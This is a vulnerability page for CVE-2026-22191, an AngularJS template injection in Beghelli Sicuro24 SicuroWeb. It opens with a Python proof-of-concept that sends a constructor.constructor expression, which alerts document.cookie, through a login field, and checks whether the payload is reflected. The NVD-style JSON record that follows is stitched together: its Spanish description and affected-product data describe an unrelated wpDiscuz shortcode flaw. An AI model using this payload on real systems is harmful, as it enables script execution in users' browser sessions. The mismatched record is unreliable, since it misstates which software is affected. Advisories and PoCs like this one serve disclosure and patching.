CVE-2026-22191

# CVE-2026-22191 PoC - AngularJS Template Injection # Target: Beghelli Sicuro24 SicuroWeb # CVSS: 5.2 (Medium) import requests TARGET = "http://target-ipv4/sicuroweb" # AngularJS template injection payload PAYLOAD = "{{constructor.constructor('alert(document.cookie)')()}}" def exploit(): # Try to inject AngularJS expression in vulnerable parameter # Common injection points: username, search, or any user-input field params = { "username": PAYLOAD, # or other injectable parameter "password": "test" } try: response = requests.post(TARGET + "/login", data=params, timeout=10) print(f"[*] Request sent to {TARGET}") print(f"[*] Payload: {PAYLOAD}") print(f"[*] Response status: {response.status_code}") # Check if payload is reflected in response if PAYLOAD in response.text or "alert" in response.text: print("[+] VULNERABLE: Payload reflected and may be executed") else: print("[-] No obvious reflection detected") except requests.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-22191", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:09.290", "lastModified": "2026-04-22T19:17:00.040", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beghelli Sicuro24 SicuroWeb contains a template injection vulnerability that allows attackers to inject arbitrary AngularJS expressions by exploiting improper rendering of untrusted input in AngularJS template contexts. Attackers can inject malicious expressions that are compiled and executed by the AngularJS 1.5.2 runtime to achieve arbitrary JavaScript execution in operator browser sessions, with network-adjacent attackers able to deliver payloads via MITM injection in plaintext HTTP deployments."}, {"lang": "es", "value": "wpDiscuz anterior a 7.6.47 contiene una vulnerabilidad de inyección de shortcode que permite a los atacantes ejecutar shortcodes arbitrarios incluyéndolos en el contenido de los comentarios enviados a través de notificaciones por correo electrónico. Los atacantes pueden inyectar shortcodes como [contact-form-7] o [user_meta] en los comentarios, los cuales se ejecutan en el servidor cuando la clase WpdiscuzHelperEmail procesa las notificaciones a través de do_shortcode() antes de wp_mail()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-POC.py", "source": "[email protected]"}, {"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-SicuroWeb-ATI-chain.txt", "source": "[email protected]"}, {"url": "https://www.beghelli.it", "source": "[email protected]"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/beghelli-sicuro24-sicuroweb-angularjs-template-injection", "source": "[email protected]"}]}}